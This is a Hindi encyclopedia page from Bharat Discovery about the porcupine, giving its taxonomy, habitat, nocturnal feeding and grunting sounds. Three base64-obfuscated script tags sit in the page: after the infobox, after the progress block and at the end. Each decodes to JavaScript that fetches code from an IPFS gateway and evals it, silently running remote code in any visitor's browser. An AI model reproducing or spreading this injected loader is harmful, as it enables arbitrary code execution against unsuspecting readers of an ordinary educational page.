सेही

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
सेही
सेही
जगत जीव - जन्तु
संघ रज्जुकी (Chordata)
वर्ग स्तनपायी (Mammalia)
गण कृंतक (रोडेन्शिया / Rodentia)
उपगण हिस्ट्रिकोमोरफा (Hystricomorpha)
अन्य जानकारी सेही सूअर की भाँती घुरघुर ध्वनियाँ निकालती है।

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

  • सेही (अंग्रेज़ी:Porcupine) अथवा साही अफ़्रीका और एशिया की प्राचीन दुनिया की सेहियाँ (हिस्ट्रिक्स) बड़ी, नाटी और छोटी टाँगों वाली कृंतक होती हैं जिनकी एक छोटी अपरिग्राही पुच्छ होते है।
  • शरीर और पुच्छ पृष्ठ ओर मोटे बालों के अतिरिक्त, सुरक्षा के लिए लम्बे, तेज़, उत्थानशील काले और सफ़ेद कंटकों या शूलों से आच्छादित होते हैं।
  • जैसा कि सामान्यतया विश्वास किया जाता है, सेहियाँ अपने कंटकों को फेंककर आक्रमण नहीं करती हैं।
  • भारतीय शिखरैधारी सेही, हिस्ट्रिक्स इन्डिका वनों, चट्टानी पहाड़ियों और तंग घाटियों में रहती हैं।
  • सेही दिन का अधिकांश समय अपने बिल में व्यतीत करती है, परंतु रात्री में फ़सलों, शाक-सब्ज़ियों और पौधों की जड़ों को खाने के लिए बाहर निकलती है।
  • सेही सूअर की भाँती घुरघुर ध्वनियाँ निकालती है।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

बाहरी कड़ियाँ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>